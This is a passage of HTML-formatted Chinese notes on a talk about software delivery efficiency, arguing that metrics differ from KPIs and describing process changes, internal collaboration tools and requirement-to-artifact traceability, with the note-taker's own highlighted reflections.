Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">度量与KPI是截然不同的概念，但常被误解。领导层和团队往往将度量视为考核工具，导致团队抵触情绪。实际上，度量的真正目的是促进改进，而非评判表现。改变这种误解需要持续的沟通和教育，这是一个渐进的过程。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】度量名字取得不好，很容易和KPI关联，现在做的，越来越不是传统意义上的量化，而是全息扫描。度量数据不应该成为考核的借口，仅仅考核出不了优秀的产品</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">度量的目标和意义</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者强调了度量与KPI的本质区别。度量的真正目的是发现问题并推动改进，而非简单地作为考核指标。他通过业务上线率的例子说明，当度量被视为KPI时，可能导致数据失真。比如为了达到90%以上的上线率，团队可能会故意设置靠后的上线时间或频繁申请变更时间，使得这个KPI一直都是99%以上。这不仅无助于改进，反而可能产生负面循环。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者还提到了千行代码bug率这样的负面指标，可能导致bug不登记或加大估算规模，暗示了选择合适度量指标的重要性。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">此外，他强调了数据自动化采集的必要性，以及在各个层面反复强调&#34;度量不等于KPI&#34;这一理念的重要性。演讲者调侃kpi、员工画像会被批判为“反人性”。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">度量的真谛：从指标陷阱到价值驱动</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">一些考核指标可能会产生负面效果。比如考核外包人员的人均任务数,容易导致外包人员为了完成指标而过度拆分任务。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">同样,考核自有员工的人均交付业务需求数量,也会使他们倾向于将需求拆分成多个小的story。这种做法可能在短期内看起来非常敏捷,大部分story都能在2天内完成。然而,这种做法存在诸多问题:准出标准不高、下游系统可用性差、各团队颗粒度不统一导致难以横向比较,形成了竖井式、散点式交付模式,忽视了端到端的价值交付。此外,金融IT部门一般显得很强势,强制要求业务方拆分需求（导致业务满意度下降）。这些都是典型的内耗型指标。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】KPI就像是面具，戴久了，就长在脸上摘不下来了</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">！</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">为改善这种状况, 演讲者提出按stories的共同父需求epic进行考核,只关注父需求的平均交付时间。这种方法有助于从全局角度出发,以最终交付的产品为导向。在评估父需求时,我们需要考虑多个因素:涉及的系统数量、交付时长、评估工时、实际工时、新功能类型、优化类型以及测试用例数等。综合这些参数,我们可以对父需求的规模做出更准确的估算。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">这种父需求评估方法相当于一个复杂的当量计算,大家难以轻易造假。无论一个需求是复杂的、中等的还是简单的,都可以通过这种方法进行评估。这样一来,管理层就不会仅仅关注需求的数量,而是更加注重需求的质量和整体价值。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】这就是创新！</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);text-decoration: underline;">反思2：上有政策，下有对策</span></strong>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">康威定律对虚拟组织和效能的挑战</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">公司为提升IT效能所采取了系统性方法。通过建立三层架构的机制，包括高层的委员会、效能执行机构、以及各基层对接人，公司旨在创建一个可持续发展的公司级效能体系。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">宏观层面，这个体系强调全面的流程和结构改进，通过定期的委员会会议来监督和推动整体效能的提升。尽管在实施过程中面临一些挑战，如维持高层次的季度效能会议面临的实际困难，但这种结构化的方法为持续改进IT效能奠定了基础。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">微观层面，针对跨组协作的挑战，提出通过IT</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;">产品经理</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">进行纵向业务交付的细粒度协调，形成纵向的敏捷小队，改善协作。然而，这个方案在实施过程中遇到了障碍。演讲者引用康威定律来解释这一现象，既有的组织结构和权力关系深刻影响着员工的行为和决策，这成为了效能提升的主要障碍。</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】反康威定律非常难，讲者在本文最后一节提了一个解法和案例</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">反思</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">3</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">看着地图摆阵势，纸上谈兵</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">照搬经典难落地，企业学习需因地制宜</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者强调，简单套用经典学习理论难以在企业中取得实质性成效。虽然初期学习r名师写的经典效能书籍，感觉好像发现新大陆一样，就是觉得这个东西应用下去就可以有什么变化，初期实践常带来虚假的成功感，但长期来看“</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;">后面发现没什么变化</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">”。</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">这是因为每个企业的组织文化都有其独特性，因此学习实践方法需要根据具体情况进行调整和定制，而非照搬照抄。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】学院派 vs 实战派</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">。</span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">重塑1：大军未动，粮草先行</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">效能提升是数字化转型的前置工作</span>    <o:page></o:page></h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">真正的数字化转型应该从内部效能提升开始，而不仅仅是实施新的功能系统。通过提升组织效能、流程效能和工程效能，可以为数字化转型奠定坚实的基础，从而实现更高的价值交付。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">同时，培养良好的项目文化和进行有效的内部宣传也是效能提升的重要组成部分。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】效能是数字化的前置，把自己摆进去转型大局</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">重塑</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">2</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">磨刀不误砍柴工</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">前期准备，优化协作标准，提升体验和效率</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者深入探讨了在复杂的软件开发环境中优化协作流程的重要性和具体方法。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">首先，他强调了建立清晰的需求标准和准入标准的必要性，打造出了很好的需求模板，这是确保项目顺利进行的基础。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">在跨团队协作方面，演讲者指出当前存在的问题：多个团队（包括核心业务、SIT、UAT、账户、中台等）之间的协作极其复杂，常常导致相互抱怨和交付效率低下。为此，他提出要通过优化流程，促进价值流动，明确显示规则，并控制在制品数量。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者特别强调了测试环节的重要性和当前面临的挑战。他以一个具体案例说明：表面上看是测试资源不足，但实际问题在于系统复杂度高，测试准备工作繁琐。</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;">测试过程本身并不复杂，但环境准备和依赖项对齐非常耗时</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">。针对这一问题，他建议制定更严格的规范，优化测试流程，并建立合理的优先级申请机制。</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】效能其实在现场，接下来才是各种辅助工具</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">为了提高效率，演讲者介绍了几个自主开发的辅助工具：</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">1. 人力甘特图：让项目管理者能够清晰地看到每个开发人员的任务时间安排，自动提示任务过载或空闲情况。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">2. 交付物排期表：旨在记录真实的交付时间，而不受KPI影响。这个工具允许团队间灵活调整交付时间，促进更有效的协作。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">3. 内部IM系统：能够一键将相关方拉入群组，实现自动归档，提高沟通效率。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者强调，这些流程优化和工具开发的目的是为了真正提高团队协作效率和项目管理水平，而不仅仅是为了达成KPI指标。他呼吁团队成员关注实际交付质量和效率，通过持续的流程改进和工具优化，最终实现更高效、更协调的软件开发流程。</span>    <o:page></o:page></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">重塑</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">3</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(30, 78, 121);">温故而鼎新</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">“平台的平台”就是平台工程</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">这个团队最初只专注于协作，现在正在扩展其职能范围。他们发现公司内部其他团队，如技术运营和基础设施团队，已经开发了一些专业平台，有成熟的工具用于监控系统健康状况、检测异常，甚至应用智能算法来减少误报。计划与这些专业团队合作，将这些专业平台进行&#34;上层化&#34;处理，整合到一个统一的效能平台中。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">这样做的目的是让更多人能够以相对基础的方式使用这些专业能力，从而提高整体工程效能。</span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">重塑</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">4</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">一把钥匙开两把锁</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">数字化的钥匙：全链路资产关联架构</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者介绍了一种资产架构体系,核心是建立需求、代码、制品和环境之间的全链路关联。这种关联始于要求开发人员在提交代码时附上需求的Task ID,逐渐得到了各方面的接受。这种关联不仅便于测试人员判断需求是否真正完成,还能在出现线上问题时快速追溯受影响的范围。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">制品与需求关联</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">以某一个面向客户的业务系统为例,演讲者介绍了如何通过建立制品和需求的关联关系,提高软件发布的质量和效率。这种方法可以有效防止遗漏或多余的需求进入发布版本。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">制品图谱</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;"> - </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">引以为豪的创新实践</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;"></span>
